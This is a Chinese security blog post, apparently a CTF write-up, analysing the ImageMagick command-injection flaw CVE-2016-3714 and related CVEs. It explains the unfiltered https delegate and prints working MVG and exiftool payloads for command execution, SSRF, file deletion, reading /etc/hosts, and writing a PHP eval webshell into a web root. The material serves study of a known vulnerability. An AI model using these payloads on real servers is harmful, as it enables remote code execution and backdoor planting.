<!DOCTYPE html><html lang="zh-Hans"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="ImageMagick命令执行漏洞（CVE-2016-3714）浅析"><meta name="keywords" content="RCE"><meta name="author" content="ColdSnap"><meta name="copyright" content="ColdSnap"><title>ImageMagick命令执行漏洞（CVE-2016-3714）浅析 | ColdSnap の Blog</title><link rel="shortcut icon" href="/favicon.ico"><link rel="stylesheet" href="/css/index.css?version=1.8.2"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css?version=1.8.2"><meta name="format-detection" content="telephone=no"><meta http-equiv="x-dns-prefetch-control" content="on"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><script>(adsbygoogle = window.adsbygoogle || []).push({
  google_ad_client: 'ca-pub-4826942730187324',
  enable_page_level_ads: 'true'
});
</script><script src="https://v1.hitokoto.cn/?encode=js&amp;charset=utf-8&amp;select=.footer_custom_text" defer></script><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: {"path":"search.xml","languages":{"hits_empty":"找不到您查询的内容:${query}"}},
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  hexoVersion: '6.3.0'
} </script><meta name="generator" content="Hexo 6.3.0"><link rel="alternate" href="/atom.xml" title="ColdSnap の Blog" type="application/atom+xml">
</head><body><canvas class="fireworks"></canvas><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true"></i><div id="sidebar" data-display="true"><div class="toggle-sidebar-info text-center"><span data-toggle="切换文章详情">切换站点概览</span><hr></div><div class="sidebar-toc"><div class="sidebar-toc__title">目录</div><div class="sidebar-toc__progress"><span class="progress-notice">你已经读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar"></div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%89%8D%E8%A8%80"><span class="toc-number">1.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ImageMagick"><span class="toc-number">2.</span> <span class="toc-text">ImageMagick</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E6%8F%8F%E8%BF%B0"><span class="toc-number">3.</span> <span class="toc-text">漏洞描述</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90"><span class="toc-number">4.</span> <span class="toc-text">漏洞分析</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8"><span class="toc-number">5.</span> <span class="toc-text">漏洞利用</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%B3%BB%E5%88%97%E6%BC%8F%E6%B4%9E"><span class="toc-number">6.</span> <span class="toc-text">系列漏洞</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E6%89%A9%E5%B1%95"><span class="toc-number">7.</span> <span class="toc-text">漏洞扩展</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%AE%9E%E4%BE%8B"><span class="toc-number">8.</span> <span class="toc-text">实例</span></a></li></ol></div></div><div class="author-info hide"><div class="author-info__avatar text-center"><img src="/img/avatar.png"></div><div class="author-info__name text-center">ColdSnap</div><div class="author-info__description text-center">Welcome to ColdSnap の Blog</div><div class="follow-button"><a target="_blank" rel="noopener" href="https://github.com/Coldwave96">Follow Me</a></div><hr><div class="author-info-articles"><a class="author-info-articles__archives article-meta" href="/archives"><span class="pull-left">文章</span><span class="pull-right">91</span></a><a class="author-info-articles__tags article-meta" href="/tags"><span class="pull-left">标签</span><span class="pull-right">41</span></a><a class="author-info-articles__categories article-meta" href="/categories"><span class="pull-left">分类</span><span class="pull-right">35</span></a></div><hr><div class="author-info-links"><div class="author-info-links__title text-center">Links</div><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="http://bodhidharmalu.github.io">Tigerlu</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="http://ghealer.top">Ghealer</a></div></div></div><div id="content-outer"><div id="top-container" style="background-image: url(/img/background.jpg)"><div id="page-header"><span class="pull-left"> <a id="site-name" href="/">ColdSnap の Blog</a></span><i class="fa fa-bars toggle-menu pull-right" aria-hidden="true"></i><span class="pull-right menus">   <a class="site-page" href="/">Home</a><a class="site-page" href="/archives">Archives</a><a class="site-page" href="/Library">Library</a><a class="site-page" href="/Tools">Tools</a><a class="site-page" href="/about">About</a></span><span class="pull-right"><a class="site-page social-icon search"><i class="fa fa-search"></i><span> 搜索</span></a></span></div><div id="post-info"><div id="post-title">ImageMagick命令执行漏洞（CVE-2016-3714）浅析</div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 2020-08-04</time><span class="post-meta__separator">|</span><i class="fa fa-inbox post-meta__icon" aria-hidden="true"></i><a class="post-meta__categories" href="/categories/Vulnerabilities/">Vulnerabilities</a><i class="fa fa-angle-right" aria-hidden="true"></i><i class="fa fa-inbox post-meta__icon" aria-hidden="true"></i><a class="post-meta__categories" href="/categories/Vulnerabilities/WEB/">WEB</a><div class="post-meta-wordcount"><span>字数总计: </span><span class="word-count">1.7k</span><span class="post-meta__separator">|</span><span>阅读时长: 6 分钟</span></div></div></div></div><div class="layout" id="content-inner"><article id="post"><div class="article-container" id="post-content"><h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>在做CTF题的时候碰到一道图片上传漏洞的题，尝试了很久发现并不能绕过检测。经过大佬提示这道题玩的是ImageMagick命令执行漏洞，CVE编号CVE-2016-3714，所以就想去好好了解一下这个漏洞。</p>
<span id="more"></span>

<h2 id="ImageMagick"><a href="#ImageMagick" class="headerlink" title="ImageMagick"></a>ImageMagick</h2><p>ImageMagick是一款功能强大，用户极多的开源图片处理软件，，可以用来读、写和处理多种格式的图片文件。很多网站开发者会调用这个程序进行图片处理，包括图片的伸缩、切割、水印、格式转换等操作。</p>
<h2 id="漏洞描述"><a href="#漏洞描述" class="headerlink" title="漏洞描述"></a>漏洞描述</h2><p>ImageMagick是一款开源图片处理库，支持PHP、Ruby、NodeJS和Python等多种语言，使用非常广泛。包括PHP imagick、Ruby rmagick和paperclip以及NodeJS imagemagick等多个图片处理插件都依赖它运行。当攻击者构造含有恶意代码得图片时，ImageMagick库对于HTTPPS文件处理不当，没有做任何过滤，可远程实现远程命令执行，进而可能控制服务器。</p>
<p>相同问题触发的漏洞有很多，如CVE-2016-3714、CVE-2016-3715、CVE-2016-3716、CVE-2016-3717，其中最严重的就是CVE-2016-3714命令执行漏洞。</p>
<p>该漏洞影响范围为ImageMagick 6.9.3-9以前的所有版本。</p>
<h2 id="漏洞分析"><a href="#漏洞分析" class="headerlink" title="漏洞分析"></a>漏洞分析</h2><p>ImageMagick之所以支持那么多的文件格式,是因为它内置了非常多的图像处理库,对于这些图像处理库,ImageMagick给它起了个名字叫做”Delegate”(委托),每个Delegate对应一种格式的文件,然后通过系统的system()命令来调用外部的lib进行处理。调用外部lib的过程是使用系统的system命令来执行的，导致命令执行的代码。</p>
<p>在ImageMagick的默认配置文件里可以看到所有的委托：&#x2F;etc&#x2F;ImageMagick&#x2F;delegates.xml</p>
<p>具体代码参考<a target="_blank" rel="noopener" href="https://github.com/ImageMagick/ImageMagick/blob/25d021ff1a60a67680dbb640ccc0b6b60f785192/magick/delegate.c">这里</a></p>
<p>该漏洞出现在mageMagick对https形式的文件处理的过程中，所以直接定位到https Delegate那里：</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&quot; <span class="tag">&lt;<span class="name">delegate</span> <span class="attr">decode</span>=<span class="string">\</span>&quot;<span class="attr">https</span>\&quot; <span class="attr">command</span>=<span class="string">\</span>&quot;&amp;<span class="attr">quot</span>;<span class="attr">wget</span>&amp;<span class="attr">quot</span>; <span class="attr">-q</span> <span class="attr">-O</span> &amp;<span class="attr">quot</span>;%<span class="attr">o</span>&amp;<span class="attr">quot</span>; &amp;<span class="attr">quot</span>;<span class="attr">https:</span>%<span class="attr">M</span>&amp;<span class="attr">quot</span>;\&quot;/&gt;</span>&quot;</span><br></pre></td></tr></table></figure>

<p>可以看到，command定义了它对于https文件处理时带入system()函数得命令：<code>&quot;wget&quot; -q -O &quot;%o&quot; &quot;https:%M&quot;</code>。有些版本可能使用的curl命令，问题还是一样的。</p>
<p>wget是从网络下载文件得命令，%M是一个占位符，被定义为输入的图片格式,也就是我们输入的url地址。但是由于只是做了简单的字符串拼接,没有做任何过滤，直接拼接到command命令中，所以我们可以将引号闭合后通过”|”,”&#96;”,”&amp;”等带入其他命令,也就形成了命令注入。</p>
<p>比如我们传入如下代码：<code>https://test.com&quot;|ls “-al</code></p>
<p>则实际得system函数执行得命令为：<code>“wget” -q -O “%o” “ https://test.com&quot;|ls “-al”</code></p>
<p>这样，ls -al命令成功执行。</p>
<h2 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h2><p>ImageMagick默认支持一种图片格式，叫mvg，而mvg与svg格式类似，其中是以文本形式写入矢量图的内容，允许在其中加载ImageMagick中其他的delegate(比如存在漏洞的https delegate)。并且在图形处理的过程中,ImageMagick会自动根据其内容进行处理,也就是说我们可以将文件随意定义为png、jpg等网站上传允许的格式,这大大增加了漏洞的可利用场景。</p>
<p>所以我们可以构造一个.mvg格式的图片（但文件名可以不为.mvg，比如下图中包含payload的文件的文件名为vul.gif，而ImageMagick会根据其内容识别为mvg图片），并在https:&#x2F;&#x2F;后面闭合双引号，写入自己要执行的命令：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">* push graphic-context</span><br><span class="line">* viewbox 0 0 640 480</span><br><span class="line">* fill &#x27;url(https://&quot;|id; &quot;)&#x27;</span><br><span class="line">* pop graphic-context</span><br></pre></td></tr></table></figure>

<p>简单解释一下上面的POC：</p>
<ul>
<li><p>push和pop是用于堆栈的操作，一个进栈，一个出栈;</p>
</li>
<li><p>viewbox是表示SVG可见区域的大小，或者可以想象成舞台大小，画布大小。简单理解就是根据后面得参数选取其中得一部分画面;</p>
</li>
<li><p>fill url()是把图片填充到当前元素内;</p>
</li>
</ul>
<p>使用fill url()的形式调用存在漏洞的https delegate，当ImageMagick去处理这个文件时,漏洞就会被触发。</p>
<h2 id="系列漏洞"><a href="#系列漏洞" class="headerlink" title="系列漏洞"></a>系列漏洞</h2><p>CVE-2016-3718：利用mvg格式中可以包含url的特点，进行SSRF攻击。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">* push graphic-context</span><br><span class="line">* viewbox 0 0 640 480</span><br><span class="line">* fill &#x27;url(http://example.com/)&#x27;</span><br><span class="line">* pop graphic-context</span><br></pre></td></tr></table></figure>

<p>CVE-2016-3715：利用ImageMagick支持的ephemeral协议，来删除任意文件。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">* push graphic-context</span><br><span class="line">* viewbox 0 0 640 480</span><br><span class="line">* image over 0,0 0,0 &#x27;ephemeral:/tmp/delete.txt&#x27;</span><br><span class="line">* popgraphic-context</span><br></pre></td></tr></table></figure>

<p>CVE-2016-3716：利用ImageMagick支持的msl协议（读取一个msl格式的xml文件，并根据其内容执行一些操作），来进行文件的读取和写入。利用这个漏洞，可以将任意文件写为任意文件，比如将图片写为一个.php后缀的webshell。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">* file_move.mvg</span><br><span class="line">* -=-=-=-=-=-=-=-=-</span><br><span class="line">* push graphic-context</span><br><span class="line">* viewbox 0 0 640 480</span><br><span class="line">* image over 0,0 0,0 &#x27;msl:/tmp/msl.txt&#x27;</span><br><span class="line">* popgraphic-context</span><br><span class="line">* </span><br><span class="line">* /tmp/msl.txt</span><br><span class="line">* -=-=-=-=-=-=-=-=-</span><br><span class="line">* &lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;</span><br><span class="line">* &lt;image&gt;</span><br><span class="line">* &lt;read filename=&quot;/tmp/image.gif&quot; /&gt;</span><br><span class="line">* &lt;write filename=&quot;/var/www/shell.php&quot; /&gt;</span><br><span class="line">* &lt;/image&gt;</span><br></pre></td></tr></table></figure>

<p>CVE-2016-3717：本地文件读取漏洞。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">* push graphic-context</span><br><span class="line">* viewbox 0 0 640 480</span><br><span class="line">* image over 0,0 0,0 &#x27;label:@/etc/hosts&#x27;</span><br><span class="line">* pop graphic-context</span><br></pre></td></tr></table></figure>

<h2 id="漏洞扩展"><a href="#漏洞扩展" class="headerlink" title="漏洞扩展"></a>漏洞扩展</h2><p>PHP扩展『ImageMagick』也存在这个问题，而且只需要调用了Imagick类的构造方法，即可触发这个漏洞。</p>
<p>除了.mvg格式的图片以外，普通png格式的图片也能触发命令执行漏洞。在ImageMagick源码中除了%m，还有%l占位符，表示图片exif label信息：</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">delegate</span> <span class="attr">decode</span>=<span class="string">&quot;miff&quot;</span> <span class="attr">encode</span>=<span class="string">&quot;show&quot;</span> <span class="attr">spawn</span>=<span class="string">&quot;True&quot;</span> <span class="attr">command</span>=<span class="string">&quot;<span class="symbol">&amp;quot;</span>/usr/bin/display<span class="symbol">&amp;quot;</span> -delay 0 -window-group %[group] -title <span class="symbol">&amp;quot;</span>%l <span class="symbol">&amp;quot;</span> <span class="symbol">&amp;quot;</span>ephemeral:%i<span class="symbol">&amp;quot;</span>&quot;</span>/&gt;</span></span><br></pre></td></tr></table></figure>

<p>它将%l拼接进入了&#x2F;usr&#x2F;bin&#x2F;display命令中，所以我只需将正常的png图片，带上一个『恶意』的exif信息。在调用ImageMagick将其处理成.show文件的时候，即可触发命令注入漏洞：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">* exiftool -label=&quot;\&quot;|/usr/bin/id; \&quot;&quot; test.png</span><br><span class="line">* convert test.png o.show</span><br></pre></td></tr></table></figure>

<p>但这个方法鸡肋之处在于，因为delegate.xml中配置的encode&#x3D;show（或win），所以只有输出为.show或.win格式的情况下才会调用这个委托，而普通的文件处理是不会触发这个命令的。</p>
<h2 id="实例"><a href="#实例" class="headerlink" title="实例"></a>实例</h2><p>最后回到那道CTF题：<a target="_blank" rel="noopener" href="http://web.jarvisoj.com:32790/">Jarvis OJ - 图片上传漏洞</a>。</p>
<p>通过网站目录扫描发现有和test.php界面，打开发现是phpinfo界面，其中开启了imagick模块：</p>
<p><img src="/img/ImageMagick/ImageMagick1.png"></p>
<p>先用 exiftool 生成一个一句话后门，路径由 phpinfo 得到：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">exiftool -label=<span class="string">&quot;\&quot;|/bin/echo \&lt;?php \@eval\(\\$\_POST\[x\]\)\;?\&gt; &gt; /opt/lampp/htdocs/uploads/x.php; \&quot;&quot;</span> normal.png </span><br></pre></td></tr></table></figure>

<p>然后上传图片：</p>
<p><img src="/img/ImageMagick/ImageMagick2.png"></p>
<p>之后就是直接连接webshell或者找flag了：</p>
<p><img src="/img/ImageMagick/ImageMagick3.png"></p>
</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:undefined">ColdSnap</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="https://coldwave96.github.io/2020/08/04/ImageMagick/">https://coldwave96.github.io/2020/08/04/ImageMagick/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="https://coldwave96.github.io">ColdSnap の Blog</a>！</span></div></div><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/RCE/">RCE</a></div><nav id="pagination"><div class="prev-post pull-left"><a href="/2020/08/06/Smashes/"><i class="fa fa-chevron-left">  </i><span>Jarvis OJ - Smashes の Write-Up</span></a></div><div class="next-post pull-right"><a href="/2020/07/29/XMAN-level6/"><span>XMAN level6 の Write-Up</span><i class="fa fa-chevron-right"></i></a></div></nav><div id="vcomment"></div><script src="https://cdn1.lncld.net/static/js/3.0.4/av-min.js"></script><script src="https://cdn.jsdelivr.net/npm/valine/dist/Valine.min.js"></script><script>var notify = 'false' == 'true';
var verify = 'false' == 'true';
var record_ip = '' == 'true';
var GUEST_INFO = ['nick','mail','link'];
var guest_info = 'nick,mail,link'.split(',').filter(function(item){
  return GUEST_INFO.indexOf(item) > -1
});
guest_info = guest_info.length == 0 ? GUEST_INFO :guest_info;
window.valine = new Valine({
  el:'#vcomment',
  notify:notify,
  verify:verify,
  recordIP:record_ip,
  appId:'R82KAmOmkqMWNJs72Fx4ub1O-gzGzoHsz',
  appKey:'Sq4B8VcTqxJ2qCeJLJa3KbKz',
  placeholder:'Please leave something ^.^',
  avatar:'mm',
  guest_info:guest_info,
  pageSize:'10',
  lang: 'zh-cn'
})</script></div></div><footer class="footer-bg" style="background-image: url(/img/background.jpg)"><div class="layout" id="footer"><div class="copyright">&copy;2019 - 2025 By ColdSnap</div><div class="framework-info"><span>驱动 - </span><a target="_blank" rel="noopener" href="http://hexo.io"><span>Hexo</span></a><span class="footer-separator">|</span><span>主题 - </span><a target="_blank" rel="noopener" href="https://github.com/Molunerfinn/hexo-theme-melody"><span>Melody</span></a></div><div class="footer_custom_text">hitokoto</div><div class="icp"><a><span>Welcome to my world ^.^</span></a></div><div class="busuanzi"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_page_pv"><i class="fa fa-file"></i><span id="busuanzi_value_page_pv"></span><span></span></span></div></div></footer><i class="fa fa-arrow-up" id="go-up" aria-hidden="true"></i><script src="https://cdn.jsdelivr.net/npm/animejs@latest/anime.min.js"></script><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@latest/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-ui-pack@latest/velocity.ui.min.js"></script><script src="/js/utils.js?version=1.8.2"></script><script src="/js/fancybox.js?version=1.8.2"></script><script src="/js/sidebar.js?version=1.8.2"></script><script src="/js/copy.js?version=1.8.2"></script><script src="/js/fireworks.js?version=1.8.2"></script><script src="/js/transition.js?version=1.8.2"></script><script src="/js/scroll.js?version=1.8.2"></script><script src="/js/head.js?version=1.8.2"></script><script src="/js/search/local-search.js"></script><script>if(/Android|webOS|iPhone|iPod|iPad|BlackBerry/i.test(navigator.userAgent)) {
  $('#nav').addClass('is-mobile')
  $('footer').addClass('is-mobile')
  $('#top-container').addClass('is-mobile')
}</script><div class="search-dialog" id="local-search"><div class="search-dialog__title" id="local-search-title">本地搜索</div><div id="local-input-panel"><div id="local-search-input"><div class="local-search-box"><input class="local-search-box--input" placeholder="搜索文章"></div></div></div><hr><div id="local-search-results"><div id="local-hits"></div><div id="local-stats"><div class="local-search-stats__hr" id="hr"><span>由</span> <a target="_blank" rel="noopener" href="https://github.com/wzpan/hexo-generator-search" style="color:#49B1F5;">hexo-generator-search</a>
 <span>提供支持</span></div></div></div><span class="search-close-button"><i class="fa fa-times"></i></span></div><div class="search-mask"></div></body></html>